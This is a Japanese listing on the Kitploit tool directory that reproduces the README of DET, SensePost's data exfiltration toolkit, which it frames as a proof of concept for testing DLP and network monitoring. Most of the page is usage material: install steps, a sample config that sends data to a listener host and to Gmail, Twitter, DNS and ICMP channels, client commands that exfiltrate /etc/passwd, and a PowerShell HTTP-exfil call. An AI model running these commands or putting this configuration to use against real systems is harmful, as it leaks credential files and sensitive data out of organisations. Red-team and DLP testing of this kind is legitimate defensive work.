Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
DET — (拡張可能な) データ流出ツールキット (DET) | Kitploit
ツール/GitHubGitHub/sensepost/det
暗号化/復号化ツールデータ流出ネットワークセキュリティペネトレーションテストレッドチーミングDNS分析
GitHubsensepost/det

DET

(拡張可能な) データ流出ツールキット (DET)

リポジトリを見る
8211908年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

DET (拡張可能) データ漏洩ツールキット

DET(AS IS で提供)は、単一または複数のチャネルを同時に使用してデータ漏洩を実行するための概念実証です。

これは、潜在的な DLP の欠陥を特定するための概念実証です。機密データや実際のデータ(評価中など)を漏洩させるために使用してはなりません。

アイデアは、さまざまなデータ漏洩技術に対して、実装されたネットワーク監視およびデータ漏洩防止(DLP)ソリューションの構成をテストするための、任意のプロトコル/サービスをプラグイン可能な汎用ツールキットを作成することでした。

プライマリリポジトリはこちらに移動しました。

スライド

DET は、2016年3月9日に BSides Ljubljana で発表されました。スライドはこちらで入手可能になります。 スライドはこちらから入手できます。

使用例(ICMP プラグイン)

サーバー側:

asciicast

クライアント側:

asciicast

2つのチャネル(Gmail/Twitter)を組み合わせた使用例

サーバー側:

asciicast

クライアント側:

asciicast

インストール

リポジトリをクローンします:

root@kitploit:~
git clone https://github.com/sensepost/DET.git

その後:

root@kitploit:~
pip install -r requirements.txt --user

設定

DET を使用するには、設定を行い、適切な設定(例: SMTP/IMAP、AES256 暗号化パスフレーズなど)を追加する必要があります。設定ファイルの例が提供されており、config-sample.json という名前です。

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

使用方法

ヘルプ

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

サーバー側:

すべてのプラグインをロードする場合:

root@kitploit:~
python det.py -L -c ./config.json

Twitter と Gmail モジュールのみをロードする場合:

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

すべてのプラグインをロードし、DNS を除外する場合:

root@kitploit:~
python det.py -L -c ./config.json -e dns

クライアント側:

すべてのプラグインをロードする場合:

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

Twitter と Gmail モジュールのみをロードする場合:

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

すべてのプラグインをロードし、DNS を除外する場合:

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

PowerShell の場合(HTTP モジュール):

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

モジュール

現在、DET は以下の複数のプロトコルをサポートしています:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP(例: Gmail)
  • Raw TCP
  • PowerShell 実装(HTTP、DNS、ICMP、SMTP(Gmail と併用))

およびその他の「サービス」:

  • Google Docs(認証なし)
  • Twitter(ダイレクトメッセージ)

実験的モジュール

現在、新しいモジュールの実装を進めており、まもなくリリース予定です。含まれるもの:

  • Skype(95% 完了)
  • Tor(80% 完了)
  • Github(30/40% 完了)

ロードマップ

  • 適切な暗号化の追加(例: AES-256)ryanohoro に感謝
  • 圧縮(非常に重要!)chokepoint に感謝
  • 適切なデータ難読化と Cloakify Toolset の統合
  • FTP、FlickR LSB Steganography、Youtube モジュール

参考文献

私がインスピレーションを得た素晴らしいプロジェクトへの参考/クレジット:

  • https://github.com/nullbind/Powershellery/ from Nullbind.
  • https://github.com/ytisf/PyExfil, 本当に素晴らしいです。
  • https://github.com/m57/dnsteal from m57.
  • https://github.com/3nc0d3r/NaishoDeNusumu from 3nc0d3r.
  • https://github.com/glennzw/exphil from Glenn Wilkinson.
  • WebExfile from Saif El-Sherei

連絡先/貢献

Twitter で @PaulWebSec までご連絡ください。 貢献したい場合は、自由にクローン、フォーク、PR を送信してください。

ライセンス

DET は MIT License の下でライセンスされています。 このライセンスの範囲を超える許可については、[email protected] までお問い合わせください。

ツールをダウンロード